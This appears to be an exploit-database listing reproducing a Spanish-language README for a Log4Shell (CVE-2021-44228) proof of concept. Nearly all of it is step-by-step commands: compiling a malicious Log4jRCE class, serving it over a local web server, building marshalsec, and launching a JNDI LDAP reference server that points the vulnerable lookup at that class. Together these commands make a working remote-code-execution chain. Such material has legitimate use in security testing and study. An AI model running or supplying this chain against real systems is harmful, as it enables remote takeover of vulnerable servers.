Exploit for Deserialization of Untrusted Data in Apache Log4J CVE-2021-44228

Name: Exploit for Deserialization of Untrusted Data in Apache Log4J CVE-2021-44228
Rating: 5 (351 reviews)

2021-12-17 | CVSS 9.3

## https://sploitus.com/exploit?id=AB801839-51E0-5EFE-B00D-ABBB6391399A
# Apache Log4j CVE-2021-44228 GK7 PoC

## Pasos

1. Compilar Log4jRCE.java y mover el archivo .class a un servidor web (ej: PHP local)
   1. `cd src/main/java`
   2. `javac Log4jRCE.java`
   3. Mover archivo .class a server web o iniciar localmente un php, por ejempl : `php -S 127.0.0.1:8888`

2. Iniciar LDAP Server
   1. `git clone git@github.com:Grupo-Kapa-7/marshalsec.git`
   2. `cd marshalsec`
   3. `mvn clean package -DskipTests`
   4. start ldap server `java -cp target/marshalsec-0.0.3-SNAPSHOT-GK7Threats-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"`
   
3. Para proabr la PoC, modificar el archivo src/main/java/log4j.java y cambiar el URL del servidor LDAP a su gusto.

### Repo Original
[https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce)